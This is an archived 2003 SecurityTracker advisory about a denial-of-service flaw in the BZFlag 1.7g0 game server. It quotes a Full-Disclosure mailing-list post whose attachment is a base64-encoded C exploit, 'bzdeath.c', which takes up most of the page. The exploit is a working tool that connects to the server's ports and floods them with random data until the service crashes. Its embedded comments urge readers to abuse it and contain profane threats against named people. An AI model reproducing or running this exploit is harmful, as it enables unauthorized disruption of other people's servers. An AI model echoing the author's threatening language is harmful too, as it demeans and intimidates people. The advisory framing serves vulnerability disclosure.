SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   BZFlag Vendors:   bzflag.org
BZFlag Game Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006801
SecurityTracker URL:  http://securitytracker.com/id/1006801
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 20 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.7g0
Description:   A vulnerability was reported in the BZFlag game server. A remote user can cause the target server's CPU utilization to increase significantly and may be able to cause the service to crash.

A remote user can connect to the BZFlag server on two ports and flood those ports with random data. This reportedly can trigger a memory leak, causing the CPU utilization to become excessive. This may also cause the daemon to crash.

The attack is reported to work best on fast connections, but has been tested to be successful on slower connections.

A demonstration exploit is provided in the Source Message [it is Base64-encoded].

Impact:   A remote user can cause excessive CPU utilization on the target server. A remote user may be able to cause the game server to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.bzflag.org/ (Links to External Site)
Cause:   Resource error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Remote bzflag 1.7g0 server DoS



--Hush_boundary-3eca1583db0b0
Content-type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

bzdeath.c attached, please abuse.

- --
russian code molester
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
Charset: UTF8

wkYEARECAAYFAj7KFYQACgkQd7MmnHrVG6W/ywCfdAyLZAGlf2B1oEYuhQA71uvheRcA
n0jo1jYMqWOkCV08mY9vuMudkzJO
=FuQb
-----END PGP SIGNATURE-----


--Hush_boundary-3eca1583db0b0
Content-type: application/octet-stream; name="bzdeath.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bzdeath.c"

LyogYnpkZWF0aC5jIGJ5IHRoZSBydXNzaWFuIGNvZGUgbW9sZXN0ZXINCg0KICAgYnpmbGFnIFti
emZsYWcub3JnXSBpcyBhIG11bHRpcGxheWVyIDNEIHRhbmsgYmF0dGxlIGdhbWUsIGEgYnVnZmVz
dA0KICAgYW5kIGEgY2hlYXRlcnMgaGVhdmVuLiBiemZsYWcgbGlzdGVucyBvbiBhdCBsZWFzdCB0
d28gdGNwIHBvcnRzLCBvbmUNCiAgIHBvcnQgZmVlZGluZyB1cyB0aGUgYnpmcyBbYnpmbGFnIHNl
cnZlcl0gdmVyc2lvbiBhbmQgcmVjb25uZWN0IHBvcnQsDQogICBhbmQgdGhlIG90aGVyIG9uZSB3
aGVyZSB0aGUgcmVhbCBmdW4gYmVnaW5zLiBmb3JjZSBmZWVkaW5nIHRoZXNlIHBvcnRzDQogICB3
aXRoIHNvbWUgbWFnaWMgZmFpcnkgcG93ZGVyIGNhbiBtYWtlIGJ6ZnMgZ28gaW5zYW5lIGFuZCBl
YXQgaXRzZWxmLg0KDQogICAuLiBvaSBvaSwgd2hhdCBiZSB0aGlzIG1hZ2lrPyEgLi4NCg0KICAg
Zmlyc3QsIHdlIGNvbm5lY3QgdG8gdGhlIHRhcmdldCBiemZsYWcgc2VydmVyIGFuZCByZWFkIHRo
ZSByZWNvbm5lY3QNCiAgIHBvcnQgZGF0YSwgOXRoIGFuZCAxMHRoIGJ5dGUgb2YgaGFuZHNoYWtl
LiB0aGVuIHdlIHJlY29ubmVjdCB0byB0aGlzDQogICBwb3J0IGFuZCBmbG9vZCBpdCB3aXRoIHJh
bmRvbSBnYXJiYWdlLCBjYXVzaW5nIGEgY3B1L21lbSBsZWFrIGluIGJ6ZnMsDQogICBtYWtpbmcg
dGhlIGNwdSB1c2FnZSBza3lyb2NrZXQuIHRoZW4sIGlmIHRoYXQgZG9lcyBub3QgbWFrZSB0aGUg
c2VydmVyDQogICBnbyBkb3duLCB3ZSByZWNvbm5lY3QgYmFjayB0byB0aGUgaW5pdGlhbCBwb3J0
IGFuZCBmbG9vZCB0aGF0IHRvbywNCiAgIGNhdXNpbmcgaGF2b2MgYW5kIHRvdGFsIG1heWhlbSAo
c2VnZmF1bHQpIHRvIG91ciBsaXR0bGUgYnpmcyBmcmllbmQuDQoNCiAgIHRoaXMgc2VlbXMgdG8g
d29yayBiZXN0IG9uICpmYXN0KiBjb25uZWN0aW9ucywgTEFOIGV0Yy4gaG93ZXZlciBpdCBoYXMN
CiAgIGJlZW4gdGVzdGVkIHF1aXRlIHN1Y2Vzc2Z1bGx5IG9uIHNsb3dlciBjb25uZWN0aW9ucyBh
cyB3ZWxsIChidXQgZG9uJ3QNCiAgIGdldCBnZXQgeW91ciBob3BlcyB1cCkgLSBhbmQgbm90ZSwg
ZXZlbiBpZiB0aGUgc2VydmVyIGRvZXMgbm90IGRpZSwNCiAgIHRoZSBjcHUvbWVtIGxlYWsgbWln
aHQgc3RpbGwgYmUgdHJpZ2dlcmVkLCBtdW5jaGluZyBhd2F5IGF0IGFsbCB0aG9zZQ0KICAgcHJl
Y2lvdXMgY3B1IGN5Y2xlcy4NCg0KICAgYnpkZWF0aC5jIGNvbXBpbGVzIHN1Y2Nlc3NmdWxseSB1
bmRlciBmYnNkIGFuZCBsaW51eC4NCg0KICAgLi4gdnVsbmVyYWJsZSB2ZXJzaW9ucyAuLg0KDQog
ICB0aGlzIGhhcyBvbmx5IGJlZW4gdGVzdGVkIG9uIHRoZSBuZXdlc3Qgc3RhYmxlIHJlbGVhc2Us
IDEuN2cwLCBidXQgSQ0KICAgc3VzcGVjdCB0aGF0IGl0IHdpbGwgd29yayBqdXN0IGFzIGdvb2Qg
b24gdGhlIG9sZGVyIG9uZXMgYXMgd2VsbC4NCg0KICAgLi4gcmVhbCBsaWZlIGV4YW1wbGUgLi4N
Cg0KICAgfiQgZ2NjIGJ6ZGVhdGguYyAtbyBiemRlYXRoIC1PMiAtV2FsbCAmJiAuL2J6ZGVhdGgg
MTAuMC4yLjM2IDUxNTUNCiAgICAgLS0gY29ubmVjdGluZyB0byAxMC4wLjIuMzY6NTE1NSAuLg0K
ICAgICAtLSBjb25uZWN0aW9uIGVzdGFibGlzaGVkIQ0KICAgICAtLSByZWN2KCk6IDQyIDVhIDQ2
IDUzIDMxIDMwIDM3IDY1IDE0IDI0DQogICAgIC0tIGJ6ZnMgc2lnbmF0dXJlIGNvbmZpcm1lZA0K
ICAgICAtLSByZWNvbm5lY3QgcG9ydCBpcyA1MTU2DQogICAgIC0tIGNvbm5lY3RpbmcgdG8gMTAu
MC4yLjM2OjUxNTYgLi4NCiAgICAgLS0gY29ubmVjdGlvbiBlc3RhYmxpc2hlZCwgYXR0YWNraW5n
IQ0KICAgICAtLSAzMDMgcGFja2V0cyAvIDE1NTEzNiBieXRlcyBzZW50DQogICAgIC0tIHNlbmQo
KSB0aW1lb3V0DQogICAgIC0tIHJlY29ubmVjdGluZyB0byAxMC4wLjIuMzY6NTE1NSAuLg0KICAg
ICAtLSBhdHRhY2tpbmchDQogICAgIC0tIDMwMyBwYWNrZXRzIC8gMTU1MTM2IGJ5dGVzIHNlbnQN
CiAgICAgLS0gc2VuZCgpIGZhaWxlZCwgcmVjb25uZWN0aW5nIC4uDQogICAgIC0tIHVuYWJsZSB0
byBjb25uZWN0LCBEb1Mgc3VjY2Vzc2Z1bD8NCg0KICAgYW5kIG9uIDEwLjAuMi4zNiBnZGIgdGVs
bHMgdXMsDQoNCiAgICJQcm9ncmFtIHJlY2VpdmVkIHNpZ25hbCBTSUdTRUdWLCBTZWdtZW50YXRp
b24gZmF1bHQuDQogICAgMHgwODA1ODM4YiBpbiBhbGFybSAoKSINCg0KICAgLi4gZmluYWwgd29y
ZHMgZm9ybSB0aGUgZGFyayBzaWRlIC4uDQoNCiAgIGFidXNlIGl0IGFsb3QsIGFuZCBzdGF5IHR1
bmVkIGZvciB0aGUgdXBjb21pbmcgc3RhY2sgc21hc2hpbmcgc2hlbGwtDQogICBzcGF3bmluZyBj
aGFjaGFjaGEgZXhwbG9pdCBmb3IgYnpmbGFnLCBzb29uIHRvIGJlIHJlbGVhc2VkLg0KDQogICBv
aCwgYW5kIGlmIHlvdSBjYW4ndCBtYWtlIHRoaXMgd29yaywgYmxhbWUgeW8gbWFtYSwgYW5kIGlm
IHlvdSBoYXZlbid0DQogICBnb3Qgb25lLCBibGFtZSBzb21lb25lIGVsc2UuDQoNCiAgIGFuZCBp
ZiB0aG9zZSBXSE9SRVMgYXQgbmV3b3JkZXIuYm94LnNrIHB1dCB0aGlzIGZpbGUgaW4gdGhlaXIg
ImxhdGVzdA0KICAgdnVsbmVyYWJpbGl0aWVzIiBzZWN0aW9uIEkgd2lsbCBodW50IHRoZW0gZG93
biBhbmQgcmlwIHRoZW0gYXBhcnQgd2l0aA0KICAgcnVzdHkgbmFpbCBjbGlwcGVycyBhbmQgY2hv
cHN0aWNrcyENCg0KICAgYW5kIGZpbmFsbHkgYSBiaWcgZnVja3lvdS1hbmQtSS1hbS1nb2luZy10
by1raWxsLWFsbC1vZi15b3UgZ29lcyB0bw0KICAgZWxlY3Ryb25pYyBzb3VscyBmb3IgYmVpbmcg
Y29kZSBzdGVhbGluZyBjb2NrZWF0ZXJzLCBhbmQgZHZkbWFuIGZvcg0KICAgYmVpbmcgYm9ybiB3
aXRob3V0IGJvdGggYSBicmFpbiBhbmQgYSBwZW5pcy4NCg0KICAgdGFrZSBjYXJlLA0KICAgLS0g
cnVzc2lhbiBjb2RlIG1vbGVzdGVyDQoNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1
ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0K
I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRl
IDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDx0aW1lLmg+DQoj
aW5jbHVkZSA8c2lnbmFsLmg+DQoNCiNkZWZpbmUgQlVGU0laRSA1MTINCiNkZWZpbmUgVElNRU9V
VCAxMA0KDQppbnQgc29ja2Nvbm5lY3QoY2hhciosIGludCk7DQppbnQgc29ja2F0dGFjaygpOw0K
dm9pZCBzaWdhbHJtX2hhbmRsZXIoKTsNCnZvaWQgc2lncGlwZV9oYW5kbGVyKCk7DQp2b2lkIGRp
ZShjaGFyKik7DQp2b2lkIGJhbm5lcigpOw0Kdm9pZCB1c2FnZSgpOw0KDQppbnQgc29ja2ZkOw0K
aW50IHJlY29uX3BvcnQ7DQppbnQgb3JpZ19wb3J0Ow0KY2hhciBob3N0WzEyOF07DQoNCmludCBt
YWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICBpbnQgaTsNCiAgY2hhciBidWZbQlVGU0la
RV07DQogIGNoYXIgYnpzaWduWzhdOw0KDQogIGlmKGFyZ2MgPCAzKSB1c2FnZSgpOw0KDQogIHNu
cHJpbnRmKGhvc3QsIHNpemVvZiBob3N0LCAiJXMiLCBhcmd2WzFdKTsNCiAgb3JpZ19wb3J0ID0g
YXRvaShhcmd2WzJdKTsNCg0KICBiYW5uZXIoKTsNCg0KICBzcmFuZCh0aW1lKDApKTsNCiAgYnpl
cm8oYnVmLCBzaXplb2YgYnVmKTsNCg0KICBzaWduYWwoU0lHQUxSTSwgc2lnYWxybV9oYW5kbGVy
KTsNCiAgc2lnbmFsKFNJR1BJUEUsIHNpZ3BpcGVfaGFuZGxlcik7DQoNCiAgcHJpbnRmKCIgLS0g
Y29ubmVjdGluZyB0byAlczolcyAuLlxuIiwgYXJndlsxXSwgYXJndlsyXSk7DQoNCiAgaWYoc29j
a2Nvbm5lY3QoaG9zdCwgb3JpZ19wb3J0KSA9PSAtMSkNCiAgICBkaWUoInVuYWJsZSB0byBjb25u
ZWN0Iik7DQogDQogIHByaW50ZigiIC0tIGNvbm5lY3Rpb24gZXN0YWJsaXNoZWQhXG4iKTsNCg0K
ICBpZihyZWN2KHNvY2tmZCwgYnVmLCAxNiwgMCkgPD0gMCkNCiAgICBkaWUoInJlY3YoKSBmYWls
ZWQiKTsNCg0KICBwcmludGYoIiAtLSByZWN2KCk6ICIpOw0KDQogIGZvcihpID0gMDsgaSA8IHN0
cmxlbihidWYpOyBpKyspDQogICAgcHJpbnRmKCIlMDJ4ICIsIGJ1ZltpXSk7DQoNCiAgcHJpbnRm
KCJcbiIpOw0KDQogIHNwcmludGYoYnpzaWduLCAiJWMlYyVjJWMiLCBidWZbMF0sIGJ1ZlsxXSwg
YnVmWzJdLCBidWZbM10pOw0KDQogIGlmKCFzdHJjbXAoYnpzaWduLCAiQlpGUyIpKQ0KICAgIHBy
aW50ZigiIC0tIGJ6ZnMgc2lnbmF0dXJlIGNvbmZpcm1lZFxuIik7DQogIGVsc2UgZGllKCJiemZz
IHNpZ25hdHVyZSBtaXNtYXRjaCAoTk9UIGJ6ZmxhZyBzZXJ2ZXIpIik7DQoNCiAgaWYoc3RybGVu
KGJ1ZikgPj0gMTApDQogICAgcmVjb25fcG9ydCA9ICgoKGludCkgYnVmW3N0cmxlbihidWYpIC0g
Ml0pIDw8IDgpIHwgYnVmW3N0cmxlbihidWYpIC0gMV07DQogIGVsc2UgZGllKCJzZXJ2ZXIgZGlk
IG5vdCBzZW5kIHJlY29ubmVjdCBwb3J0Iik7DQoNCiAgaWYocmVjb25fcG9ydCA+PSAgNjQgKiAx
MDI0IHx8IHJlY29uX3BvcnQgPD0gMCkNCiAgICBkaWUoInNlcnZlciBzZW50IGlsbGVnYWwgcmVj
b25uZWN0IHBvcnQiKTsNCg0KICBwcmludGYoIiAtLSByZWNvbm5lY3QgcG9ydCBpcyAlZFxuIiwg
cmVjb25fcG9ydCk7DQogIHByaW50ZigiIC0tIGNvbm5lY3RpbmcgdG8gJXM6JWQgLi5cbiIsIGhv
c3QsIHJlY29uX3BvcnQpOw0KDQogIGNsb3NlKHNvY2tmZCk7DQoNCiAgaWYoc29ja2Nvbm5lY3Qo
aG9zdCwgcmVjb25fcG9ydCkgPT0gLTEpDQogICAgZGllKCJ1bmFibGUgdG8gY29ubmVjdCIpOw0K
DQogIHByaW50ZigiIC0tIGNvbm5lY3Rpb24gZXN0YWJsaXNoZWQsIGF0dGFja2luZyFcbiIpOw0K
DQogIHdoaWxlKDEpIHsNCiAgICBzb2NrYXR0YWNrKCk7DQogICAgY2xvc2Uoc29ja2ZkKTsNCiAN
CiAgICBzbGVlcCgxKTsNCg0KICAgIGlmKHNvY2tjb25uZWN0KGFyZ3ZbMV0sIHJlY29uX3BvcnQp
ID09IC0xKQ0KICAgICAgYnJlYWs7DQogIH0NCg0KICBwcmludGYoIiAtLSB1bmFibGUgdG8gY29u
bmVjdCwgRG9TIHN1Y2Nlc3NmdWw/XG4iKTsNCg0KICByZXR1cm4gMDsNCn0NCg0KaW50IHNvY2tj
b25uZWN0KGNoYXIgKmhvc3QsIGludCBwb3J0KSB7DQogIHN0cnVjdCBob3N0ZW50ICpoZTsNCiAg
c3RydWN0IHNvY2thZGRyX2luIHJlbW90ZV9hZGRyOw0KDQogIGlmKChoZSA9IGdldGhvc3RieW5h
bWUoaG9zdCkpID09IE5VTEwpDQogICAgcmV0dXJuIC0xOw0KDQogIHJlbW90ZV9hZGRyLnNpbl9m
YW1pbHkgPSBBRl9JTkVUOw0KICByZW1vdGVfYWRkci5zaW5fYWRkciA9ICooKHN0cnVjdCBpbl9h
ZGRyICopaGUtPmhfYWRkcik7DQogIHJlbW90ZV9hZGRyLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7
DQogIG1lbXNldCgmKHJlbW90ZV9hZGRyLnNpbl96ZXJvKSwgMHgwMCwgOCk7DQoNCiAgaWYoKHNv
Y2tmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkpID09IC0xKQ0KICAgIHJldHVy
biAtMTsNCg0KICBpZihjb25uZWN0KHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGVf
YWRkciwgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzaXplb2Yoc3Ry
dWN0IHNvY2thZGRyKSkgPT0gLTEpDQogICAgcmV0dXJuIC0xOw0KDQogIHJldHVybiAwOw0KfQ0K
DQppbnQgc29ja2F0dGFjaygpIHsNCiAgY2hhciBidWZbQlVGU0laRV07DQogIHVuc2lnbmVkIGxv
bmcgYXR0YWNrX3BhY2tldHMgPSAwOw0KICBpbnQgaTsNCg0KICB3aGlsZSgxKSB7DQogICAgYWxh
cm0oVElNRU9VVCk7DQoNCiAgICBmb3IoaSA9IDA7IGkgPCBzaXplb2YgYnVmOyBpKyspDQogICAg
ICBidWZbaV0gPSByYW5kKCkgJSAyNTY7DQoNCiAgICBhdHRhY2tfcGFja2V0cysrOw0KICAgIHBy
aW50ZigiXHIgLS0gJWxkIHBhY2tldHMgLyAlbGQgYnl0ZXMgc2VudCAiLCBhdHRhY2tfcGFja2V0
cywgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXR0YWNr
X3BhY2tldHMgKiBzaXplb2YgYnVmKTsNCiAgICBmZmx1c2goc3Rkb3V0KTsNCg0KICAgIGlmKHNl
bmQoc29ja2ZkLCBidWYsIHNpemVvZiBidWYsIDApICE9IHNpemVvZiBidWYpIHsNCiAgICAgIHBy
aW50ZigiXG4gLS0gc2VuZCgpIGZhaWxlZCwgcmVjb25uZWN0aW5nIC4uXG4iKTsNCiAgICAgIGJy
ZWFrOw0KICAgIH0NCg0KICB9DQoNCiAgcmV0dXJuIDA7DQp9DQoNCnZvaWQgc2lnYWxybV9oYW5k
bGVyKCkgew0KICBwcmludGYoIlxuIC0tIHNlbmQoKSB0aW1lb3V0XG4iKTsNCiAgY2xvc2Uoc29j
a2ZkKTsgIA0KDQogIHByaW50ZigiIC0tIHJlY29ubmVjdGluZyB0byAlczolZCAuLlxuIiwgaG9z
dCwgb3JpZ19wb3J0KTsNCg0KICBpZihzb2NrY29ubmVjdChob3N0LCBvcmlnX3BvcnQpID09IC0x
KQ0KICAgIGRpZSgidW5hYmxlIHRvIGNvbm5lY3QsIERvUyBzdWNjZXNzZnVsPyIpOw0KDQogIHBy
aW50ZigiIC0tIGF0dGFja2luZyFcbiIpOw0KICBzb2NrYXR0YWNrKCk7DQoNCiAgcmV0dXJuOw0K
fQ0KDQp2b2lkIHNpZ3BpcGVfaGFuZGxlcigpIHsNCiAgcHJpbnRmKCJcbiIpOw0KICBkaWUoImdv
dCBTSUdQSVBFLCB0YXJnZXQgZGVhZD8iKTsNCiAgcmV0dXJuOw0KfQ0KDQp2b2lkIGRpZShjaGFy
ICp0ZXh0KSB7DQogIGZwcmludGYoc3RkZXJyLCAiIC0tIGVycm9yOiAlc1xuIiwgdGV4dCk7DQog
IGV4aXQoMSk7DQp9DQoNCnZvaWQgYmFubmVyKHZvaWQpIHsNCiAgcHJpbnRmKCJCIFogRCBFIEEg
VCBIIC4gYyBieSBydXNzaWFuIGNvZGUgbW9sZXN0ZXIgLiAuICAuXG4iKTsNCiAgcmV0dXJuOw0K
fQ0KDQp2b2lkIHVzYWdlKHZvaWQpIHsNCiAgZnByaW50ZihzdGRlcnIsICJ1c2FnZTogYnpkZWF0
aCA8aG9zdD4gPHBvcnQ+XG4iKTsNCiAgZXhpdCgxKTsNCn0NCg0KLy8gRU9GDQo=

--Hush_boundary-3eca1583db0b0--



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC